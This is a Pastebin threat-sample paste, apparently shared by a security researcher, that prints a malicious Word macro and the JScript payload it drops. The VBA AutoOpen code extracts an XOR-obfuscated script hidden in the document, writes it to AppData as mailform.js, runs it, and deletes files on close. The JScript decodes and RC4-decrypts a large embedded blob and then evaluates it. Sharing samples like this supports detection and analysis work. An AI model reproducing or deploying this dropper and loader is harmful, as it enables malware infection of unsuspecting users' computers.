SHARE
TWEET

[DOC/JS threat] Uploaded by @JohnLaTwC

a guest Jan 27th, 2017 4,072 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #sample hash: 2299ff9c7e5995333691f3e68373ebbb036aa619acd61cbea6c5210490699bb6
  2. #uploaded by @JohnLaTwC
  3. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  4. ## Word document with macro: 2299ff9c7e5995333691f3e68373ebbb036aa619acd61cbea6c5210490699bb6
  5. Public OBKHLrC3vEDjVL As String
  6. Public B8qen2T433Ds1bW As String
  7. Function Q7JOhn5pIl648L6V43V(EjqtNRKMRiVtiQbSblq67() As Byte, M5wI32R3VF2g5B21EK4d As Long) As Boolean
  8. Dim THQNfU76nlSbtJ5nX8LY6 As Byte
  9. THQNfU76nlSbtJ5nX8LY6 = 45
  10. For i = 0 To M5wI32R3VF2g5B21EK4d - 1
  11. EjqtNRKMRiVtiQbSblq67(i) = EjqtNRKMRiVtiQbSblq67(i) Xor THQNfU76nlSbtJ5nX8LY6
  12. THQNfU76nlSbtJ5nX8LY6 = ((THQNfU76nlSbtJ5nX8LY6 Xor 99) Xor (i Mod 254))
  13. Next i
  14. Q7JOhn5pIl648L6V43V = True
  15. End Function
  16. Sub AutoClose()
  17. On Error Resume Next
  18. Kill OBKHLrC3vEDjVL
  19. On Error Resume Next
  20. Set R7Ks7ug4hRR2weOy7 = CreateObject("Scripting.FileSystemObject")
  21. R7Ks7ug4hRR2weOy7.DeleteFile B8qen2T433Ds1bW & "\*.*", True
  22. Set R7Ks7ug4hRR2weOy7 = Nothing
  23. End Sub
  24. Sub AutoOpen()
  25. On Error GoTo MnOWqnnpKXfRO
  26. Dim NEnrKxf8l511
  27. Dim N18Eoi6OG6T2rNoVl41W As Long
  28. Dim M5wI32R3VF2g5B21EK4d As Long
  29. N18Eoi6OG6T2rNoVl41W = FileLen(ActiveDocument.FullName)
  30. NEnrKxf8l511 = FreeFile
  31. Open (ActiveDocument.FullName) For Binary As #NEnrKxf8l511
  32. Dim E2kvpmR17SI() As Byte
  33. ReDim E2kvpmR17SI(N18Eoi6OG6T2rNoVl41W)
  34. Get #NEnrKxf8l511, 1, E2kvpmR17SI
  35. Dim KqG31PcgwTc2oL47hjd7Oi As String
  36. KqG31PcgwTc2oL47hjd7Oi = StrConv(E2kvpmR17SI, vbUnicode)
  37. Dim N34rtRBIU3yJO2cmMVu, I4j833DS5SFd34L3gwYQD
  38. Dim VUy5oj112fLw51h6S
  39. Set VUy5oj112fLw51h6S = CreateObject("vbscript.regexp")
  40. VUy5oj112fLw51h6S.Pattern = "MxOH8pcrlepD3SRfF5ffVTy86Xe41L2qLnqTd5d5R7Iq87mWGES55fswgG84hIRdX74dlb1SiFOkR1Hh"
  41. Set I4j833DS5SFd34L3gwYQD = VUy5oj112fLw51h6S.Execute(KqG31PcgwTc2oL47hjd7Oi)
  42. Dim Y5t4Ul7o385qK4YDhr
  43. If I4j833DS5SFd34L3gwYQD.Count = 0 Then
  44. GoTo MnOWqnnpKXfRO
  45. End If
  46. For Each N34rtRBIU3yJO2cmMVu In I4j833DS5SFd34L3gwYQD
  47. Y5t4Ul7o385qK4YDhr = N34rtRBIU3yJO2cmMVu.FirstIndex
  48. Exit For
  49. Next
  50. Dim Wk4o3X7x1134j() As Byte
  51. Dim KDXl18qY4rcT As Long
  52. KDXl18qY4rcT = 15387
  53. ReDim Wk4o3X7x1134j(KDXl18qY4rcT)
  54. Get #NEnrKxf8l511, Y5t4Ul7o385qK4YDhr + 81, Wk4o3X7x1134j
  55. If Not Q7JOhn5pIl648L6V43V(Wk4o3X7x1134j(), KDXl18qY4rcT + 1) Then
  56. GoTo MnOWqnnpKXfRO
  57. End If
  58. B8qen2T433Ds1bW = Environ("appdata") & "\Microsoft\Windows"
  59. Set R7Ks7ug4hRR2weOy7 = CreateObject("Scripting.FileSystemObject")
  60. If Not R7Ks7ug4hRR2weOy7.FolderExists(B8qen2T433Ds1bW) Then
  61. B8qen2T433Ds1bW = Environ("appdata")
  62. End If
  63. Set R7Ks7ug4hRR2weOy7 = Nothing
  64. Dim K764B5Ph46Vh
  65. K764B5Ph46Vh = FreeFile
  66. OBKHLrC3vEDjVL = B8qen2T433Ds1bW & "\" & "mailform.js"
  67. Open (OBKHLrC3vEDjVL) For Binary As #K764B5Ph46Vh
  68. Put #K764B5Ph46Vh, 1, Wk4o3X7x1134j
  69. Close #K764B5Ph46Vh
  70. Erase Wk4o3X7x1134j
  71. Set R66BpJMgxXBo2h = CreateObject("WScript.Shell")
  72. R66BpJMgxXBo2h.Run """" + OBKHLrC3vEDjVL + """" + " NPEfpRZ4aqnh1YuGwQd0"
  73. ActiveDocument.Save
  74. Exit Sub
  75. MnOWqnnpKXfRO:
  76. Close #K764B5Ph46Vh
  77. ActiveDocument.Save
  78. End Sub
  79.  
  80. ## writes this payload to C:\Users\<user>\AppData\Roaming\Microsoft\Windows\mailform.js
  81.  
  82. try {
  83.    var lVky = WScript.Arguments;
  84.    var DASz = lVky(0);
  85.    var Iwlh = lyEK();
  86.    Iwlh = JrvS(Iwlh);
  87.    Iwlh = xR68(DASz, Iwlh);
  88.    eval(Iwlh);
  89. } catch (e) {
  90.    WScript.Quit();
  91. }
  92.  
  93. function af5Q(eDBn) {
  94.    var X4u3 = eDBn.charCodeAt(0);
  95.    if (X4u3 === 0x2B || X4u3 === 0x2D) return 62
  96.    if (X4u3 === 0x2F || X4u3 === 0x5F) return 63
  97.    if (X4u3 < 0x30) return -1
  98.    if (X4u3 < 0x30 + 10) return X4u3 - 0x30 + 26 + 26
  99.    if (X4u3 < 0x41 + 26) return X4u3 - 0x41
  100.    if (X4u3 < 0x61 + 26) return X4u3 - 0x61 + 26
  101. }
  102.  
  103. function JrvS(dmBv) {
  104.    var TLzh = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
  105.    var i;
  106.    var j;
  107.    var v5P7;
  108.    if (dmBv.length % 4 > 0)
  109.        return;
  110.    var Qgp4 = dmBv.length;
  111.    var jX8T = dmBv.charAt(Qgp4 - 2) === '=' ? 2 : dmBv.charAt(Qgp4 - 1) === '=' ? 1 : 0
  112.    var y8wu = new Array(dmBv.length * 3 / 4 - jX8T);
  113.    var L71j = jX8T > 0 ? dmBv.length - 4 : dmBv.length;
  114.    var XJqO = 0;
  115.  
  116.    function bQld(uHBU) {
  117.        y8wu[XJqO++] = uHBU;
  118.    }
  119.    for (i = 0, j = 0; i < L71j; i += 4, j += 3) {
  120.        v5P7 = (af5Q(dmBv.charAt(i)) << 18) | (af5Q(dmBv.charAt(i + 1)) << 12) | (af5Q(dmBv.charAt(i + 2)) << 6) | af5Q(dmBv.charAt(i + 3));
  121.        bQld((v5P7 & 0xFF0000) >> 16)
  122.        bQld((v5P7 & 0xFF00) >> 8)
  123.        bQld(v5P7 & 0xFF)
  124.    }
  125.    if (jX8T === 2) {
  126.        v5P7 = (af5Q(dmBv.charAt(i)) << 2) | (af5Q(dmBv.charAt(i + 1)) >> 4)
  127.        bQld(v5P7 & 0xFF)
  128.    } else if (jX8T === 1) {
  129.        v5P7 = (af5Q(dmBv.charAt(i)) << 10) | (af5Q(dmBv.charAt(i + 1)) << 4) | (af5Q(dmBv.charAt(i + 2)) >> 2)
  130.        bQld((v5P7 >> 8) & 0xFF)
  131.        bQld(v5P7 & 0xFF)
  132.    }
  133.    return y8wu
  134. }
  135.  
  136. function xR68(oGy3, SwPd) {
  137.    var Yvh0 = [];
  138.    var LFdV = 0;
  139.    var EzAm;
  140.    var y8wu = '';
  141.    for (var i = 0; i < 256; i++) {
  142.        Yvh0[i] = i;
  143.    }
  144.    for (var i = 0; i < 256; i++) {
  145.        LFdV = (LFdV + Yvh0[i] + oGy3.charCodeAt(i % oGy3.length)) % 256;
  146.        EzAm = Yvh0[i];
  147.        Yvh0[i] = Yvh0[LFdV];
  148.        Yvh0[LFdV] = EzAm;
  149.    }
  150.    var i = 0;
  151.    var LFdV = 0;
  152.    for (var y = 0; y < SwPd.length; y++) {
  153.        i = (i + 1) % 256;
  154.        LFdV = (LFdV + Yvh0[i]) % 256;
  155.        EzAm = Yvh0[i];
  156.        Yvh0[i] = Yvh0[LFdV];
  157.        Yvh0[LFdV] = EzAm;
  158.        y8wu += String.fromCharCode(SwPd[y] ^ Yvh0[(Yvh0[i] + Yvh0[LFdV]) % 256]);
  159.    }
  160.    return y8wu;
  161. }
  162.  
  163. function lyEK() {
  164.    var U5l2 = "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